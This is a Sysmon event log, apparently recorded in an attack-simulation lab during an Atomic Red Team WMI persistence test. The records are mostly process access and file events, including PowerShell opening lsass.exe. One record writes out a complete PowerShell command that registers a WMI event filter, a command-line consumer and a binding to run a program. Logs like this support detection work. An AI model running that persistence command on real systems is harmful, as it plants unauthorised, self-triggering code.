13:54:43.939{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004660Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.939{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004659Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.893{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gtae0a3k.zod.ps12020-12-08 13:54:43.893 10341000x80000000000000004658Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.893{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004657Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.861{10ACEC4A-85A2-5FCF-E700-000000009101}25604296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF819346143) 10341000x80000000000000004656Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.861{10ACEC4A-85A1-5FCF-E000-000000009101}33242792C:\Windows\system32\conhost.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004655Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.861{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004654Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.861{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004653Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.861{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004652Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.861{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004651Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.861{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004650Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.861{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004649Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.861{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004648Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.861{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004647Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.861{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004646Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.861{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004645Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.861{10ACEC4A-85A2-5FCF-E700-000000009101}25604296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\221211b0f1173771b1b65a7943b57a5c\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\221211b0f1173771b1b65a7943b57a5c\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\221211b0f1173771b1b65a7943b57a5c\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\221211b0f1173771b1b65a7943b57a5c\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662527a8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+6625261c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662d4e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+6624b204(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d04677(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66271ecb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662553c1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66247346(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662804d6(wow64) 154100x80000000000000004644Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.866{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; EventNameSpace='root\CimV2'; QueryLanguage=\""WQL\""; Query=\""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\""}; $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; CommandLineTemplate=\""$($Env:SystemRoot)\System32\notepad.exe\"";} $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs $FilterToConsumerArgs = @{ Filter = [Ref] $Filter; Consumer = [Ref] $Consumer; } $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{10ACEC4A-85A1-5FCF-2492-080000000000}0x892240HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADQANgAuADAAMAAzACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== 11241100x80000000000000004643Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.861{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2020-12-08 13:54:43.861 11241100x80000000000000004642Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.861{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2020-12-08 13:54:43.861 11241100x80000000000000004641Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:43.471{10ACEC4A-85A3-5FCF-EA00-000000009101}4324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\hinonazn\hinonazn.dll2020-12-08 13:54:43.393 10341000x80000000000000004640Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.456{10ACEC4A-85A1-5FCF-E000-000000009101}33242792C:\Windows\system32\conhost.exe{10ACEC4A-85A3-5FCF-EB00-000000009101}3136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004639Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004638Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:43.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004637Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 